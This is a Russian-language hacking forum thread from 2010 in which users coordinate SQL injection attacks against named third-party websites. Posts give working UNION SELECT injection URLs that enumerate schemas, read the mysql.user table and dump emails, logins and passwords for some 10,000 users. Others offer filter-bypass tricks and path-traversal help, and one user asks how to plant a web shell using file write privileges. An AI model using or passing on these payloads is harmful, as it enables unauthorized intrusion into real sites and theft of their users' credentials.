03.11.2010, 16:33
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами:
9288132
Репутация:
571
|
|
Сообщение от None
Вот так перебрал до 50, результат - ничего не найдено
Дальше терпения не хватило? Или ты думаешь, что всё заканчивается на 50-ой таблице? =\
Сообщение от None
Table 'krost.USER' doesn't exist
Таблица в другой бд
http://www.krost.ru/index.php?id=91&dep=&krost_news=97+and+1=0+UnIon+s elECt+1,2,table_schema,4,5,database(),7,8,9+from+i nformation_schema.columns+where+table_name='USER'+ limit+1,100+--+
Запрос к этой таблице в бд mysql
http://www.krost.ru/index.php?id=91&dep=&krost_news=97+and+1=0+UnIon+s elECt+1,2,3,4,5,6,7,8,9+from+mysql.user+--+
|
|
|
03.11.2010, 16:46
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами:
8772211
Репутация:
56
|
|
Сообщение от budden
Есть инклуд (линукс), но слэш (/) вырезается. Никаких других способов подняться на директорию вверх (../) нет, ведь?
https://rdot.org/forum/showpost.php?p=3323&postcount=16
|
|
|
|
03.11.2010, 16:56
|
|
Участник форума
Регистрация: 15.08.2010
Сообщений: 260
С нами:
8285366
Репутация:
62
|
|
nimferus, смотри позицию последней table_column через метод тыка аля limit 1000,1 - false делим на 2 limit 500,1 - true значит больше 500 и меньше 1000, limit 750,1 - false.. ну ты понел.. когда знаем точное число запускаем цикл аля for(int i=0;i
|
|
|
|
03.11.2010, 17:56
|
|
Новичок
Регистрация: 25.11.2009
Сообщений: 0
С нами:
8663103
Репутация:
0
|
|
Сообщение от Чакэ
nimferus, смотри позицию последней table_column через метод тыка аля limit 1000,1 - false делим на 2 limit 500,1 - true значит больше 500 и меньше 1000, limit 750,1 - false.. ну ты понел..
Это что еще за изврат?!
select count(*) from information_schema.columns
И все!
|
|
|
|
03.11.2010, 18:17
|
|
Новичок
Регистрация: 02.11.2010
Сообщений: 5
С нами:
8171606
Репутация:
0
|
|
Всем спасибо, немного разобрался, пойду дальше пыхтеть)
|
|
|
|
03.11.2010, 21:21
|
|
Участник форума
Регистрация: 15.08.2010
Сообщений: 260
С нами:
8285366
Репутация:
62
|
|
Сообщение от brutos
Это что еще за изврат?!
select count(*) from information_schema.columns
И все!
извините ступил.. вроде sql не первый год юзаю а в скуль не додумался такое ставить.. черт.
|
|
|
|
03.11.2010, 22:25
|
|
Новичок
Регистрация: 20.04.2010
Сообщений: 1
С нами:
8452680
Репутация:
0
|
|
есть 2 базы
inform.schema
data
делаю такой запрос:
http://www.sffaoss.om/index.php?id=-24 union select 1,2, group_concat(email,0x3a,login,0x3a,password),4,5 from users --
пишет что не существует поля email
http://www.sffaoss.om/index.php?id=-24 union select 1,2, group_concat(email,0x3a,login,0x3a,password),4,5 from users.data --
и так
http://www.sffaoss.om/index.php?id=-24 union select 1,2, group_concat(email,0x3a,login,0x3a,password),4,5 from data.users --
тоже самое
Помогите разобраться с запросом, через тулзу по одному не вариант в базе 10k юзеров
|
|
|
|
03.11.2010, 22:35
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от ALIM
есть 2 базы
inform.schema
data
делаю такой запрос:
http://www.sffaoss.om/index.php?id=-24 union select 1,2, group_concat(email,0x3a,login,0x3a,password),4,5 from users --
пишет что не существует поля email
http://www.sffaoss.om/index.php?id=-24 union select 1,2, group_concat(email,0x3a,login,0x3a,password),4,5 from users.data --
и так
http://www.sffaoss.om/index.php?id=-24 union select 1,2, group_concat(email,0x3a,login,0x3a,password),4,5 from data.users --
тоже самое
Помогите разобраться с запросом, через тулзу по одному не вариант в базе 10k юзеров
попробуй unhex(hex()) , aes_encrypt
|
|
|
|
03.11.2010, 22:51
|
|
Moderator - Level 7
Регистрация: 04.02.2007
Сообщений: 554
С нами:
10139306
Репутация:
1089
|
|
Сообщение от ALIM
Помогите разобраться с запросом,
Как здесь можно помочь разобраться с запросом- если мы не знаем настоящую ссылку? Ведь насколько я помню доменная зона
om обычно используется с приставкой net (net.om) покрайней мере по твоей ссылке зайти не могу и гугл домен sffaoss.om - незнает.....
P.S. Или это только у меня ???
|
|
|
|
03.11.2010, 23:55
|
|
Познающий
Регистрация: 14.01.2009
Сообщений: 93
С нами:
9116636
Репутация:
39
|
|
Привет, такая ситуация, есть инъекция в селекте, есть file_priv, кавычки не экранируются, есть фулл пасс к сайту. Но проблема в том, что, как я понял, прав на запись во что-то, видное из инета, не хватает - я могу записать в /tmp, но куда-то на сайт - нет. На сайте нету форм аплоада, в админке тоже нету, видимо картинки грузятся по фтп. Соседние сайты такие же ущербные, по крайней мере, на первый взгляд. Если я правильно понимаю, единственный вариант залить шелл в подобных условиях - найти писабельную папку? Ось freebsd, но при load_file папки я вижу несколько левых символов, но не вижу листинг файлов (почему такое может быть?). Какие есть тулзы для поиска форм аплоада? Спасибо
|
|
|
|
|
 |
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Комбинированный вид
